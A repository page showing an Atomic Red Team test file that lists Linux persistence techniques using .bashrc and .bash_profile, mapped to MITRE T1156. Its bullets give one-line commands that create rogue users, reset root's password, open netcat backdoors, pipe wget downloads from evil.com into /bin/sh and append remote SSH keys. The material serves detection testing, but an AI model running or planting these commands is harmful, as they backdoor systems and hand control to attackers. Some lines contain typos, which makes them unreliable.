security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
533e27193fcdff5782f989b8739cf2b4a9d2e015
atomic-red-team/Linux/Persistence/bash_profile_and_bashrc.md
T
Rahmat Nurfauzi 4842ffb05d Persistence .bashrc / .bash_profile
2018-01-07 05:55:19 +07:00

21 lines
928 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
# .bash_profile and .bashrc
MITRE ATT&CK Technique: [T1156](https://attack.mitre.org/wiki/Technique/T1156)
* Adding an unauthorized user (useradd)
* `useradd test && echo test:testpass | chpasswd`
* Changing the password to an existing user (noisy, passwd)
* `echo root:NoLogon | chpasswd` (use nologon as pass word for a tiny bit of obscurity)
* Create a backdoor listener (netcat)
* `nc nlp 8080`
* Create a backdoor callback (netcat)
* `nc 192.168.0.1 8080`
* Retrieve commands from a C2 server (wget or curl)
* `wget https://evil.com/more/commands.txt | /bin/sh`
* Download additional tools and execute (wget or curl)
* `wget https://evil.com/bad/executeable | /bin/sh`
* Add key to authorized_keys file (paste or get from remote server)
* `echo $(wget https://evil.com/bad/ssh/key.txt) >> ~/.ssh/authotized_keys`
* Set an alias to do additional tasks
* `alias ls='ls al & <any command from above>'`
Reference in New Issue View Git Blame Copy Permalink